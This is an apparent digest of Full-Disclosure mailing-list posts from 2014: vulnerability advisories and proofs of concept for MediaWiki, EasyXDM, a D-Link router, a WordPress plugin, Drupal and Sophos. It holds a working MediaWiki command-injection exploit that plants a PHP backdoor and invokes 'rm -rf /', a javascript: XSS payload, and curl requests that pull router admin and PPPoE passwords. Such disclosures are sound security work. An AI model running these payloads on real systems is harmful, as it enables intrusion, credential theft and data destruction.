[Full-disclosure] Jetro Cockpit Secure Browsing vulnerability - remote code execution on all enterprise workstations simultaneously

[Ronen Z]

A critical vulnerability was discovered in Jetro Cockpit Secure Browsing, a
popular enterprise secure browsing solution.

The vulnerability allows simultaneous remote code execution into all the
enterprise workstations using the product. The vulnerability is unique in
that it breaks the basic value proposition of the security product in which
it is found.

Full disclosure and details here:
http://blog.quaji.com/2014/02/remote-code-execution-on-all-enterprise.html

Ronen Zilberman
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2851-1] drupal6 security update

[Salvatore Bonaccorso]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2851-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
February 02, 2014  http://www.debian.org/security/faq
- -

Package: drupal6
Vulnerability  : impersonation
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2014-1475

Christian Mainka and Vladislav Mladenov reported a vulnerability in the
OpenID module of Drupal, a fully-featured content management framework.
A malicious user could exploit this flaw to log in as other users on the
site, including administrators, and hijack their accounts.

These fixes require extra updates to the database which can be done from
the administration pages.

For the oldstable distribution (squeeze), this problem has been fixed in
version 6.30-1.

We recommend that you upgrade your drupal6 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJS7qNRAAoJEAVMuPMTQ89EYqoP+wUL/5MNsjxndj/ospigHtTS
GzPc9HGxU7FYHKn2b8+rkdpXrbHer1CV+tO8aNj74oEf7ogfpq+VnPxzfyUkTt+U
q11pYx5R+mAfTbRktMcQJDCxKvwfd/nwWSCnlDNHaA8YlvPmLIPHXlUR5NEVJLAy
aixManZInNlkwNxLmBoC4vuy8boa5lD3iV6YzQk61utJsgshLytVZIxAnA1hz+kl
GEwubJHjop0j4Aqc8hZYvHWjJYHoNANYGAT8TRZ2fhgjkNEqKbooU6BME1MxxgeI
9hnB7xj37tR2T+p6KVaNIg3zeM1LVrbqKFALszkxqZFgpIIaesPGCLAfn0UCCqL1
vMHW0G4mzytL0F8hG11XbW3rJCkddleIy+2nKur5YA5dkYINve9GhX8MWG40wxXc
RQmou8HbFQcQZ8X9aNmWb1VMBnJkmw5M4ldp/J3vceRvPbpTer5a0U/0637AmGgD
ipe9Zv2JahhEZmbT+stdC+3YH5VXeUB6BQf0/xhbb01XYFT7c8FAe3z0vwKaq+6Q
S6OzU9TzscX6NVIYx+KYSDinlsocv5yatDBttucBRr/NBvUhLQYmTQr5g2STZmEZ
Hlyob+PKW49Fax8qVmlilSkQ9A9+D7C7eskl6nmS/CFzfLaHsj+EDGEU6sSp67Jf
R/h1N5OfP462uBf1vXMG
=D+VD
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Revision 1 (PoC added): MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)

[Pichaya Morimoto]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit
(CVE-2014-1610)
# Reported by Netanel Rubin - Check Point’s Vulnerability Research Group
(Jan 19, 2014)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
# Affected website : Wikipedia.org and more !
#
# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
# Release dates : Feb 1, 2014
# Special Thanks to 2600 Thailand !
#


# Exploit:

1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
http://vulnerable-site/index.php/Special:Upload
2. inject os cmd to upload a php-backdoor
http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20
"images/xnz.php`
3. access to php-backdoor!
http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
4. happy pwning!!


# Related files:

thumb.php <-- extract all _GET array to params
/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width
options
/includes/media/ImageHandler.php
/includes/GlobalFunctions.php
/includes/filerepo/file/File.php

# Vulnerability Analysis:

1. thumb.php
This script used to resize images if it is configured to be done
when the web browser requests the image
transform( $params, File::RENDER_NOW ); // << resize image
by width/height
...
// Stream the file if there were no errors
$thumb->streamFile( $headers );
...
?>
2. /includes/filerepo/file/File.php
getHandler(); // << PDF Handler
...
$normalisedParams = $params;
$handler->normaliseParams( $this, $normalisedParams );
...
$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
..
?>
3. /extensions/PdfHandler/PdfHandler_body.php
&1";
...
$err = wfShellExec( $cmd, $retval );
...
?>
4. /includes/GlobalFunctions.php
Execute a shell command, with time and memory limits
Error generating thumbnail

Error generating thumbnail

เกิดปัญหาไม่สามารถทำรูปย่อได้: /bin/bash: -: command not found
convert: option requires an argument `-resize' @
error/convert.c/ConvertImageCommand/2380.
GPL Ghostscript 9.10: Unrecoverable error, exit code 1







GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;
my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1

uid=33(www-data) gid=33(www-data) groups=33(www-data)


# Back-end $cmd

GlobalFunctions.php : wfShellExec()
cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150
-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |
'/usr/bin/convert' -depth 8 -resize 10|`echo "images/longcat.php` -
'/tmp/transform_0e377aad0e27-1.jpg') 2>&1

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU
BzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf
ny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1
mijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2
uCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb
GO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv
n2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh
FXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt
vuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ
M0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan
kumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR
2LmeyQR2rzjBB7Sovvcn
=ooEs
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)

[Pichaya Morimoto]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit
(CVE-2014-1610)
# Reported by Netanel Rubin - Check Point's Vulnerability Research Group
(Jan 19, 2014)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
# Affected website : Wikipedia.org and more !
#
# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
# Release dates : Feb 1, 2014
# Special Thanks to 2600 Thailand !
#


# Exploit:

1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
http://vulnerable-site/index.php/Special:Upload
2. inject os cmd to upload a php-backdoor
http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20
"images/xnz.php`
3. access to php-backdoor!
http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
4. happy pwning!!


# Related files:

thumb.php <-- extract all _GET array to params
/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width
options
/includes/media/ImageHandler.php
/includes/GlobalFunctions.php
includes/filerepo/file/File.php

# Vulnerability Analysis:

1. thumb.php
This script used to resize images if it is configured to be done
when the web browser requests the image
transform( $params, File::RENDER_NOW ); // << resize image
by width/height
...
// Stream the file if there were no errors
$thumb->streamFile( $headers );
...
?>
2. /includes/filerepo/file/File.php
getHandler(); // << PDF Handler
...
$normalisedParams = $params;
$handler->normaliseParams( $this, $normalisedParams );
...
$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
..
?>
3. /extensions/PdfHandler/PdfHandler_body.php
&1";
...
$err = wfShellExec( $cmd, $retval );
...
?>
4. /includes/GlobalFunctions.php
Execute a shell command, with time and memory limits
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [CVE-2014-1403] DOM XSS in EasyXDM 2.4.18

[Krzysztof Kotowicz]

Affected products
=
easyXDM library < 2.4.19 - http://easyxdm.net/wp/

easyXDM is a Javascript library that enables you as a developer to easily
work around the limitation set in place by the Same Origin Policy, in turn
making it easy to communicate and expose javascript API's across domain
boundaries.

Vulnerabilities are fixed in version 2.4.19. All users are advised to
upgrade.

CVE
===
CVE-2014-1403

DOM XSS in name.html location.hash value


Description
---
EasyXDM uses name.html file to bootstrap cross origin communication
between documents. It accepts various parameters in location.hash value,
one of which is the URL of the document to load. Value of this parameter
is not filtered, allowing to pass javascript: URL that may execute
arbitrary Javascript code in context of the domain hosting EasyXDM
installation.

This vulnerability is described in greater details in [1]

Analysis

The root cause of the vulnerability is the following code in name.html
file:

if (location.hash) { // DOM XSS source
  if (location.hash.substring(1, 2) === "_") {
var channel, url,
  hash = location.href.substring(location.href.indexOf("#") + 3),
indexOf = hash.indexOf(",");
if (indexOf == -1) {
  channel = hash;
}
else {
  channel = hash.substring(0, indexOf);
  url = decodeURIComponent(hash.substring(indexOf + 1));
}
switch (location.hash.substring(2, 3)) {
  /...
  case "3":
// NameTransport remote
var guest = window.parent.frames[
  "easyXDM_" + channel + "_provider"
  ];
if (!guest) {
  throw new Error("unable to reference window");
}
guest.easyXDM.Fn.get(channel)(window.name);
location.href = url + "#_4" + channel + ","; // DOM XSS sink
break;

Part of location hash, under certain conditions, ends up in location.href
assignment, triggering JS execution.

Proof of Concept


   http://domain/example/bridge.html"; onload="document.getElementById('f'
).src=
'http://domain/name.html#_3constructor,javascript:alert(document.domain)//'
;"> 

Credits
===
Vulnerability found by Krzysztof Kotowicz 
http://blog.kotowicz.net

Timeline

  - 2013-01-xx - Discovery
  - 2013-01-10 - Notified project maintainer
  - 2013-01-19 - Fixed version release
  - 2013-01-31 - Public disclosure

Related links
=
[1]
http://blog.kotowicz.net/2014/01/xssing-with-shakespeare-name-calling.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Router D-Link DIR-100 Multiple Vulnerabilities

[root]

tl;dr: You could simply `ask` the D-Link DIR-100-D1 for the administrator 
password.
Report is also available at: 
http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt

Enjoy
* Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: r...@euer.krebsco.de
* Vulnerable Software: 
ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software:
ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers: 
* CWE-287 Authentication Issues: CVE-2013-7051
* CWE-255 Issues with Credential Management: CVE-2013-7052
* CWE-352 Cross-Site Request Forgery:CVE-2013-7053
* CWE-79  Cross-Site Scripting:  CVE-2013-7054
* CWE-200 Information Disclosure:CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8

# Table of Contents

1. Background
2. Vulnerability Description
3. Technical Description
4. Severity and Remediation
5. Timeline

# 1. Background

The DIR-100 is designed for easy and robust connectivity among heterogeneous
standards-based network devices. Computers can communicate directly with this
router for automatic opening and closing of UDP/TCP ports to take full
advantage of the security provided without sacrificing functionality of on-line
applications.

# 2 Vulnerability Description

Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet
Broadband Router Revision D (and potentially other devices sharing the 
affected firmware) that could allow a remote attacker:

 - Retrieve the Administrator password without authentication leading to
   authentication bypass [CWE-255]
 - Retrieve sensitive configuration paramters like the pppoe username and
   password without authentication [CWE-200]
 - Execute privileged Commands without authentication through a race
   condition leading to weak authentication enforcement [CWE-287]
 - Sending formatted request to a victim which then will execute arbitrary
   commands on the device (CSRF) [CWE-352]
 - Store arbitrary javascript code which will be executed when a victim
   accesses the administrator interface [CWE-79]

CVE-Numbers for these vulnerabilities has not yet been assigned.

# 3 Technical Description of the Vulnerabilities

## 3.0 The DIR-100 Web Interface and CGI

The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for
unauthenticated users and `/cli.cgi` for authenticated requests.

list of features provided by each cgi-script can be retrieved by:

curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'

## 3.1 Authentication Bypass

### Description

The administrator password is not protected in any way on the device, every
attacker with access to the administrator interface which listens on port 80.
For retrieving the Administrator password the request must not be
authenticated. 


### Proof of Concept

The web interface provides two distinct ways to retrieve the adminstrator
password:

curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'

## 3.2 Weak Authentication

### Description

As soon as a user is logged into the administration interface, the cli CGI
is `unlocked` and can be used by without authenticating before as
the cgi-script does not check any other authentication parameters such as
cookies or HTTP Parameters. The only access check is if the IP-Address is 
the same. 

### Proof of Concept

# open the router interface in a web browser and log in
firefox  'http://192.168.0.1/' 

# open a new terminal or another web-browser which is currently not logged
# in and try to access

curl 'http://192.168.0.1/cli.cgi?cmd=help'

# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login 

## 3.3 Retrieve sensitive information

### Description

Besides retrieving the administrator password without authentication it is
possible to retrieve other sensitive configuration from the device as well like
the PPTP and poe Username and Password, as well as the configured dyndns
username and password and configured mail log credentials when these parameters
are configured. 
No authentication is requred.

### Proof of Concept

curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cli

[Full-disclosure] Bypass the Stop User Enumeration WordPress Plugin

[Andrew Horton]

Stop User Enumeration is a WordPress plugin that provides protection
against an unauthenticated attacker gaining a list of all WordPress users.
This information can aid an attacker in further attacks against the website
including brute-force password guessing attacks. This can be performed
using wp-scan.
Homepage: http://wordpress.org/plugins/stop-user-enumeration/
Version: 1.2.4 (latest)

According to the full disclosure methodology  I have publicly disclosed
this at the same time as notifying the vendor.

Advisory
-
An attacker can bypass the username enumeration protection by using POST
requests. The protection currently only stops GET requests to enumerate
users.

By sending POST requests with the body of "author=1" and incrementing the
number over successive requests, the entire set of WordPress users can be
enumerated.

The WordPress user information is disclosed in the HTML response body,
unlike being disclosed in the redirect header, as with GET requests.

   1.

   POST / HTTP/1.1
   Host: www.wordpress.com
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 8

   author=1











Andrew Horton (urbanadventurer)
www.morningstarsecurity.com

Visit my meta-aggregator of security news at
http://www.morningstarsecurity.com/news/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CVE-2014-1610 description incorrect

[Brandon Perry]

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1610

It states that authentication is required to exploit this and this is not
true.

What does require authentication usually is uploading the file. If there is
already a djvu file that has been uploaded by another user, you do not need
authentication to exploit this.

https://gist.github.com/brandonprry/8746891

I believe this should be revised as the exploit itself does not require
authentication. I think that will also result in a score change as well.



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CVE-2014-1213 - Denial of Service in Sophos Anti Virus

[advisories]

Vulnerability title: Denial of Service in Sophos Anti Virus
CVE: CVE-2014-1213
Vendor: Sophos
Product: Anti Virus
Version: 10.0.11/Engine 3.48.x
Reported by: Graham Sutherland
Details:

The following system objects do not have access control lists (ACLs)
set, thus allowing any user to access and manipulate them:

Global objects (in namespace \Global, a.k.a. \BaseNamedObjects):

  $$!_EVENT_$!__
  $$!_EVENT_$!__DataUpdateRequest
  $$!_EVENT_$!__MmfMutexSAV-
  $$!_EVENT_$!__MmfMutexSAV-Info
  $$!_EVENT_$!__ReadyForUpdateSAV-
  $$!_EVENT_$!__ReadyForUpdateSAV-Info
  $$!_EVENT_$!__SAV-
  $$!_EVENT_$!__SAV-Info
  $$!_EVENT_$!__StateChange
  $$!_EVENT_$!__SuspendedSAV-
  $$!_EVENT_$!__SuspendedSAV-Info
  $$!_EVENT_$!__UpdateComplete
  $$!_EVENT_$!__UpdateMutex
  $$!_EVENT_$!__UpdateRequest
  $$!_MMMF_$!__
  SAV-
  SAV-Info

Session objects (in namespace \Sessions\n\BaseNamedObjects):

SophosALMonSessionInstance


Further details at:
http://www.portcullis-security.com/security-research-and-downloads/secur
ity-advisories/cve-2014-1213/


Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
###
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company, 
registered in England in accordance with the Companies 
Act under number 02763799. The registered office 
address of Portcullis Computer Security Limited is: 
The Grange Barn, Pikes End, Pinner, MIDDX, 
United Kingdom, HA5 2EX. 
The information in this email is confidential and may be 
legally privileged. It is intended solely for the addressee. 
Any opinions expressed are those of the individual and 
do not represent the opinion of the organisation. Access 
to this email by persons other than the intended recipient 
is strictly prohibited.
If you are not the intended recipient, any disclosure, 
copying, distribution or other action taken or omitted to be 
taken in reliance on it, is prohibited and may be unlawful. 
When addressed to our clients any opinions or advice 
contained in this email is subject to the terms and 
conditions expressed in the applicable Portcullis Computer 
Security Limited terms of business.
###

#
This e-mail message has been scanned for Viruses and Content and cleared 
by MailMarshal.
#

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/